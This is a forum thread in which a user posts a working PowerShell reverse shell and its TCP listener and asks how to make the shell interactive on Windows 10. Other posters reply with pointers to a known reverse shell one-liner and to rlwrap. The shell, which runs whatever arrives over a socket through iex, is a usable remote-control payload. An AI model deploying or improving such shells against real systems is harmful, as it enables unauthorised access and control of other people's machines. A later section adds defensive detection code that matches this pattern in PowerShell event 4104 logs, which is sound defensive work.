Need some Help with a payload and reverse shell, how to make it interactive?

Host = Windows 10

Target = Windows 10

#Listener:
$socket = new-object System.Net.Sockets.TcpListener('127.0.0.1', 9001);

if($socket -eq $null){
    exit 1
}

$socket.start()
$client = $socket.AcceptTcpClient()
write-output "[*] Connection!"
$stream = $client.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 2048;
$encoding = new-object System.Text.AsciiEncoding;

do
{
    $cmd = read-host
    $writer.WriteLine($cmd)
    $writer.Flush();
    if($cmd -eq "exit"){
        break
    }
    $read = $null;
    while($stream.DataAvailable -or $read -eq $null) {
        $read = $stream.Read($buffer, 0, 2048)
        $out = $encoding.GetString($buffer, 0, $read)
        Write-Output $out
    }

} While ($client.Connected -eq $true)

$socket.Stop()
$client.close();
$stream.Dispose()

#Shell:

$sm=(New-Object Net.Sockets.TCPClient('127.0.0.1',9001)).GetStream();
#COMMENT
[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;
$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);
$bypass = "ASCII"
$st=([text.encoding]::$bypass).GetBytes((iex $d 2>&1));
$sm.Write($st,0,$st.Length)}

The shell is not interactive. It can do “whoami” and “dir”, but when I try to use “cd” it gives an error on the target side and just uses the last command. This is run in PowerShell ISE.

Any thoughts or help?
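From the defender's side, the shell posted above has a recognisable shape in PowerShell script block logging (event ID 4104 in the Microsoft-Windows-PowerShell/Operational log): a raw TCP socket, a `Read` loop on its stream, and `iex` run on the received bytes. The following is an added example, not code from this thread or from the linked one-liner; it assumes script block logging is enabled and that the session can read the Operational log.

```powershell
# Added example: flag script blocks that pair a raw TCP socket with code execution
# on data read from it (the shape of the listener/shell pair above).
function Test-SocketShellPattern {
    param([Parameter(Mandatory)][string]$ScriptText)
    # All three indicators must be present; each alone is common in benign scripts.
    $socketPattern = 'Net\.Sockets\.(TcpClient|TcpListener)|\.GetStream\(\)'
    $execPattern   = '\b(iex|Invoke-Expression)\b'
    $readPattern   = '\.Read\(\s*\$\w+\s*,\s*0\s*,'
    $hits = @{
        Socket = [regex]::IsMatch($ScriptText, $socketPattern, 'IgnoreCase')
        Exec   = [regex]::IsMatch($ScriptText, $execPattern,   'IgnoreCase')
        Read   = [regex]::IsMatch($ScriptText, $readPattern,   'IgnoreCase')
    }
    [pscustomobject]@{
        Suspicious = ($hits.Socket -and $hits.Exec -and $hits.Read)
        Indicators = ($hits.GetEnumerator() | Where-Object Value | ForEach-Object Key) -join ','
    }
}

# Constructed sample (not a real log entry) so the function can be exercised offline.
$sample = '$sm=(New-Object Net.Sockets.TCPClient(''10.0.0.1'',9001)).GetStream();' +
          'while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){ iex $d }'
Test-SocketShellPattern -ScriptText $sample          # Suspicious = True

# Sweep recent 4104 events; Properties[2] carries the ScriptBlockText field.
$events = Get-WinEvent -FilterHashtable @{
    LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104
} -MaxEvents 500 -ErrorAction SilentlyContinue

foreach ($e in $events) {
    $text = [string]$e.Properties[2].Value
    $r = Test-SocketShellPattern -ScriptText $text
    if ($r.Suspicious) {
        $firstLine = ($text -split "`n")[0]
        [pscustomobject]@{
            Time       = $e.TimeCreated
            Indicators = $r.Indicators
            Preview    = $firstLine.Substring(0, [Math]::Min(80, $firstLine.Length))
        }
    }
}
```

Long script blocks are split across several 4104 events, so a socket call and its `iex` can land in different records; reassembling by the ScriptBlockId field (Properties[3]) before matching removes that gap.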

It appears to be working. Errors are still thrown on the shell’s side but the directory change happens.

Ok, thank you. Is there a way to make it look more interactive? I know this on Linux but not on Windows.

thanks again

Define “look more interactive.” If you are talking about a prompt to show things like the current working directory, you can do that, yep. It’s just a matter of your shell sending that information. You can see an example of that here: powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok · GitHub

If you mean more things like arrow keys, command history, etc., you can add that by using rlwrap on the server side.


Thank you very much!
